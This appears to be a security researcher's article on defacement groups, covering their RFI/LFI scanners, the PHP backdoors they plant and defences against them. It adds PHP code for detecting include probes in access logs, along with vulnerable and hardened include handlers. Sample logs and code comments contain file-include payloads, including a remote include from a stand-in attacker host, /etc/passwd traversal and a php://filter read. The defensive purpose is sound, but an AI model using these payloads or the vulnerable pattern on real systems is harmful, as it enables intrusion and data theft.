Introduction

My fellow researcher Tim Armstrong (from Kaspersky Lab USA) and I recently took a quick look at a tool used by defacers to report mass defacements to a big defacement archive. The website with the defacement tool also offered a PHP backdoor. Out of curiosity I did some Google queries to see how common the PHP backdoor was and whether I would come across even more PHP backdoors and/or hundreds of compromised servers running various PHP backdoors.
I then started to look into how these backdoors are placed on the servers, and what techniques and methods the attackers use.
Overall, the entire setup is pretty simple, but before going into detail I’d like to clarify the terminology used in this article to refer to attackers. The terms “defacers”, “crackers” and “hackers” are all used in the community, but the media tends to refer to such attackers simply as “hackers”. I prefer the term “defacers” for the people behind these tools and defacement games.
A defacer is someone who doesn’t really care which site they attack; their main aim is simply to find and exploit a vulnerability on a server and then either replace the website content or upload a file indicating that they were there. No one really knows why defacers do this, as there is no monetary gain. However, a look at some of the defacement archives indicates that different defacement groups are competing against each other. As mentioned above, although the media tends to refer to such people as hackers, I would say that “real” hackers don’t attack random sites, but rather use their knowledge to conduct targeted attacks. Such attackers purposefully try to prevent site owners from becoming aware of the attack, and do what they can to erase all evidence of it.
Attacks performed by defacers are referred to as “defacements”; there are large websites which act as defacement archives, and groups compete against each other to see which group can deface the most websites. These archives are publicly accessible, meaning that every group can see how many points it (or any other group) has.
As I have mentioned, the defacers aren’t selective in their targets; in most cases they just use automated tools to find vulnerable servers and exploit them automatically. The exploit uploads a backdoor to the compromised server which provides, for example, shell access. The defacer can launch further attacks via the backdoor, such as trying to escalate privileges using local kernel exploits, or report the compromised server to a defacement archive. These backdoors are also sold on the black market, enabling buyers to, for example, turn a compromised server into a node in a DDoS network or use it as a spam relay.
Once an attack has been conducted, the defacement will automatically be reported to an archive. Below is a screenshot from a backdoor which reports back to a large defacement archive:
The methods

The methods used by defacers tend to be very similar, even across different groups: they have scanners which identify vulnerable servers to exploit, and then upload backdoors that report the compromised server back to the attacker and sometimes serve as additional scanners.
In most cases, the exploits used are publicly available rather than zero-day. The following screenshot provides a glimpse of the publicly available vulnerabilities on a given day.
Below is a screenshot of a site offering “Google Dorks” for VopCrew IJO Scanner v1.2
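The scanners described above leave a recognisable trail in web server logs: the same client walking through many hosts with a URL, a stream wrapper or a directory traversal sequence stuffed into an include parameter. The following is an added example, not code from the article or from any of the tools listed, that flags such probes in combined-format access logs. The log lines, IP addresses, parameter name and User-Agent strings are constructed for illustration and are not taken from any real scanner.

```php
<?php
declare(strict_types=1);

// Added example (not part of the original article): spot remote/local file
// include probes in Apache/nginx combined-format access logs.
// The four lines below are CONSTRUCTED sample data; the IPs, payloads and
// User-Agents are assumptions used only to exercise the detector.
const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [10/Mar/2010:12:01:02 +0000] "GET /index.php?page=http://198.51.100.7/id.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.5 - - [10/Mar/2010:12:01:03 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1834 "-" "libwww-perl/5.805"
192.0.2.44 - - [10/Mar/2010:12:02:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2010:12:01:04 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 3021 "-" "libwww-perl/5.805"
LOG;

/** Classify one decoded parameter value, or return null when it looks benign. */
function classifyIncludePayload(string $value): ?string
{
    if (preg_match('#\A(https?|ftp)://#i', $value)) {
        return 'RFI';          // include of a remote URL
    }
    if (preg_match('#\A(php|data|expect|phar)://#i', $value)) {
        return 'LFI-wrapper';  // PHP stream wrapper used to read or execute local content
    }
    if (str_contains($value, '../') || str_contains($value, '..\\') || str_contains($value, "\0")) {
        return 'LFI';          // directory traversal; the NUL byte cuts off an appended suffix
    }
    return null;
}

/**
 * Parse combined-format log lines and return one finding per suspicious
 * query parameter: ['ip' => ..., 'param' => ..., 'kind' => ..., 'request' => ...].
 */
function findFileIncludeProbes(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Client IP is the first field; the request line is the first quoted field.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"/', $line, $m)) {
            continue;
        }
        [, $ip, $method, $target] = $m;
        $query = parse_url($target, PHP_URL_QUERY);
        if (!is_string($query) || $query === '') {
            continue;
        }
        parse_str($query, $params); // parse_str URL-decodes, so %00 becomes a real NUL byte
        foreach ($params as $name => $value) {
            $kind = classifyIncludePayload((string) $value);
            if ($kind !== null) {
                $findings[] = ['ip' => $ip, 'param' => (string) $name, 'kind' => $kind, 'request' => "$method $target"];
            }
        }
    }
    return $findings;
}

/** Count probes per source IP; a scanner typically produces many hits from one address. */
function probesByIp(array $findings): array
{
    $counts = [];
    foreach ($findings as $f) {
        $counts[$f['ip']] = ($counts[$f['ip']] ?? 0) + 1;
    }
    arsort($counts);
    return $counts;
}

$findings = findFileIncludeProbes(SAMPLE_LOG);
foreach ($findings as $f) {
    printf("%-12s %-12s param=%s  %s\n", $f['ip'], $f['kind'], $f['param'], $f['request']);
}
foreach (probesByIp($findings) as $ip => $n) {
    printf("%s: %d probe(s)\n", $ip, $n);
}
```

On the constructed sample this reports three probes, all from 203.0.113.5 (one RFI, one LFI with a NUL byte, one php:// wrapper), and nothing for the ordinary `page=about` request. The detector keys on the payload rather than the User-Agent, since scanners can set any User-Agent they like; in production the signatures would be run over the full log stream and correlated by source IP and time.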
The tools

The tools defacers use to find new vulnerable servers mainly check for two types of vulnerabilities: Remote or Local File Include vulnerabilities. Here’s a partial list of such free tools, all of which are publicly available:
- LFI intruder
- VopCrew IJO Scanner v1.2
- Single LFI vulnerable scanner
- SCT SQL SCANNER
- Priv8 RFI SCANNER v3.0
- PITBULL RFI-LFI SCANNER
- Osirys SQL RFI LFI SCANNER
- FeeLCoMz RFI Scanner Bot v5.0 By FaTaLisTiCz_Fx
The solution

One major problem in combating defacements is that defacers aren’t only exploiting technical vulnerabilities, they are also exploiting ignorance. Many people who work with web servers today do not understand the importance of having a system which is up to date and fully patched.
Even though patching is important and relatively simple, for some reason one of the most common security issues is a failure to keep on top of it. Companies and organizations often put a lot of time and effort into teaching their IT personnel how SQL injection and buffer overflows work and how they can be exploited, when it would be more sensible to focus on ensuring that systems are fully patched and configured properly.
Another major issue is that administrators automatically assume that Linux/Unix is more secure than Windows, and simply don’t do any local hardening or configuration.
Proper configuration can more or less eliminate certain types of exploits. For instance, many of the exploits mentioned in this article are “File Include” type vulnerabilities, which enable an attacker to include any arbitrary file he wants; in some cases these files can be fetched from external websites. In PHP, disabling allow_url_include (and, where the application does not need it, allow_url_fopen) stops the remote variant outright, and restricting the directories a web application is allowed to read from (open_basedir) confines the local variant to the application’s own tree. Note that this confinement is not a complete fix: files inside the allowed directory, such as uploaded content or configuration files, can still be included, so the application itself must also validate which file it opens.
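To make the point concrete, here is an added example (not code from the article or from any of the tools it lists) showing the vulnerable include pattern the scanners above look for next to a hardened version that only serves files from a fixed directory. The `page` parameter, the `pages/` directory and the file names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example (not part of the original article). The "page" parameter
// and the pages/ directory are assumptions.
const PAGES_DIR = __DIR__ . '/pages';

/** Vulnerable: whatever the client sends is handed straight to include. */
function renderPageVulnerable(string $page): void
{
    // ?page=http://attacker.example/shell.txt?   -> remote file include
    //    (when allow_url_include is On, or allow_url_fopen on PHP < 5.2)
    // ?page=../../../../etc/passwd%00            -> local file include
    //    (the NUL byte truncated the ".php" suffix on PHP < 5.3.4)
    // ?page=php://filter/convert.base64-encode/resource=config
    //    -> reads source of config.php instead of executing it
    include $page . '.php';
}

/**
 * Hardened: accept only a plain file name, resolve it under PAGES_DIR and
 * confirm the resolved path is still inside that directory.
 * Returns the path to include, or null when the request is rejected.
 */
function resolvePage(string $page, string $baseDir = PAGES_DIR): ?string
{
    // A bare name: no separators, no "..", no "://", no NUL byte.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $page . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: realpath resolves symlinks, so also check that the
    // final location is still below the base directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

function renderPageHardened(string $page): void
{
    $path = resolvePage($page);
    if ($path === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include $path;
}

renderPageHardened($_GET['page'] ?? 'home');
```

The regex alone already rejects every payload in the comments above; the realpath containment check is there so that a later loosening of the regex, or a symlink dropped into `pages/`, does not silently reopen the hole. Pair the code with the server-side settings the text describes, in php.ini or the virtual host: `allow_url_include = Off`, `allow_url_fopen = Off` if nothing legitimately needs it, and `open_basedir` set to the site’s document root, so that a vulnerability in one application cannot be used to read files belonging to another.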